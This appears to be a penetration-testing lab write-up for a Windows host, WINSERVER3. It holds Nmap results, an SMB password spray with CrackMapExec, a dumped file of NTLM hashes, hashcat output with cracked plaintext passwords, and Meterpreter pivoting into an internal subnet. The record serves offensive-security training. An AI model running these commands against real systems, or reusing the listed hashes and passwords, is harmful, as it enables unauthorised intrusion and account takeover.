π₯·WINSERVER3
IP: 192.168.100.55
Nmap Scans
Nmap scan report for ip-192-168-100-55.ap-south-1.compute.internal (192.168.100.55)
Host is up (0.00051s latency).
Not shown: 65520 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49685/tcp open msrpc Microsoft Windows RPC
49686/tcp open msrpc Microsoft Windows RPC
MAC Address: 02:E2:1E:D0:78:62 (Unknown)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Nmap scan report for ip-192-168-100-55.ap-south-1.compute.internal (192.168.100.55)
Host is up (0.00052s latency).
Not shown: 992 closed udp ports (port-unreach)
PORT STATE SERVICE VERSION
123/udp open|filtered ntp
137/udp open netbios-ns Microsoft Windows netbios-ns (workgroup: WORKGROUP)
138/udp open|filtered netbios-dgm
500/udp open|filtered isakmp
3389/udp open|filtered ms-wbt-server
4500/udp open|filtered nat-t-ike
5353/udp open|filtered zeroconf
5355/udp open|filtered llmnr
MAC Address: 02:F9:2B:6D:C6:06 (Unknown)
Service Info: Host: WINSERVER-03; OS: Windows; CPE: cpe:/o:microsoft:windows
SMB Enumeration
SMB Version


root@kali:~# crackmapexec rdp 192.168.100.55 -u lawrence -p /root/Desktop/names.txt
usage: crackmapexec [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--darrell] [--verbose] {ssh,winrm,ldap,smb,mssql} ...
crackmapexec: error: argument protocol: invalid choice: 'rdp' (choose from 'ssh', 'winrm', 'ldap', 'smb', 'mssql')
root@kali:~# crackmapexec smb 192.168.100.55 -u lawrence -p /root/Desktop/names.txt
SMB 192.168.100.55 445 WINSERVER-03 [*] Windows Server 2019 Datacenter 17763 x64 (name:WINSERVER-03) (domain:WINSERVER-03) (signing:False) (SMBv1:True)
SMB 192.168.100.55 445 WINSERVER-03 [-] WINSERVER-03\\lawrence:lw9875 STATUS_LOGON_FAILURE
SMB 192.168.100.55 445 WINSERVER-03 [-] WINSERVER-03\\lawrence:blanca STATUS_LOGON_FAILURE
SMB 192.168.100.55 445 WINSERVER-03 [+] WINSERVER-03\\lawrence:computadora

Hashdumping
root@kali:~# vim win3_hashdump
root@kali:~# hashcat -m 1000 -a 0 -O win3_hashdump /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 9.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================
* Device #1: pthread-Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz, 5843/5907 MB (2048 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 27
Hashes: 8 digests; 7 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Optimized-Kernel
* Zero-Byte
* Precompute-Init
* Meet-In-The-Middle
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
INFO: Removed 1 hash found in potfile.
Host memory required for this attack: 64 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
61fb34469b9989b01be4e8630c52eed6:swordfish
18aa104784f77431563b1a1b67f6096c:computadora
11637a16fca11b3604e3e68d5221b3c7:hotmama
0f2011271b98907e6d288066567d3319:blanca
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: NTLM
Hash.Target......: win3_hashdump
Time.Started.....: Mon Aug 19 08:58:27 2024 (11 secs)
Time.Estimated...: Mon Aug 19 08:58:38 2024 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1324.7 kH/s (1.22ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 5/7 (71.43%) Digests
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 6538/14344385 (0.05%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[213134356173382a] -> $HEX[042a0337c2a156616d6f732103]
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>
Started: Mon Aug 19 08:58:26 2024
Stopped: Mon Aug 19 08:58:39 2024
root@kali:~# cat win3_hashdump
admin:1011:aad3b435b51404eeaad3b435b51404ee:0f2011271b98907e6d288066567d3319:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:61fb34469b9989b01be4e8630c52eed6:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
lawrence:1009:aad3b435b51404eeaad3b435b51404ee:18aa104784f77431563b1a1b67f6096c:::
mary:1010:aad3b435b51404eeaad3b435b51404ee:11637a16fca11b3604e3e68d5221b3c7:::
student:1008:aad3b435b51404eeaad3b435b51404ee:bd4ca1fbe028f3c5066467a7f6a73b0b:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
root@kali:~#
Pivoting
[*] Performing ping sweep for IP range 192.168.0.0/24
[+] 192.168.0.1 host found
[+] 192.168.0.57 host found
[+] 192.168.0.50 host found
[+] 192.168.0.51 host found
[+] 192.168.0.61 host found
Autoroute and scanning
meterpreter > run autoroute -s 192.168.0.0/24
meterpreter > portfwd add -l 1255 -p 80 -r 192.168.0.51
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 3389,22,80,10000
PORTS => 3389,22,80,10000
msf6 auxiliary(scanner/portscan/tcp) > run
[+] 192.168.0.61: - 192.168.0.61:3389 - TCP OPEN
[*] 192.168.0.61: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.0.2
RHOSTS => 192.168.0.2
msf6 auxiliary(scanner/portscan/tcp) > run
[*] 192.168.0.2: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.0.51
RHOSTS => 192.168.0.51
msf6 auxiliary(scanner/portscan/tcp) > run
[+] 192.168.0.51: - 192.168.0.51:80 - TCP OPEN
[+] 192.168.0.51: - 192.168.0.51:3389 - TCP OPEN
[+] 192.168.0.51: - 192.168.0.51:22 - TCP OPEN
[+] 192.168.0.51: - 192.168.0.51:10000 - TCP OPEN
[*] 192.168.0.51: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.0.57
RHOSTS => 192.168.0.57
msf6 auxiliary(scanner/portscan/tcp) > run
[+] 192.168.0.57: - 192.168.0.57:22 - TCP OPEN
[*] 192.168.0.57: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) >


Webmin server:

Default credentials on Webmin are the vulnerability.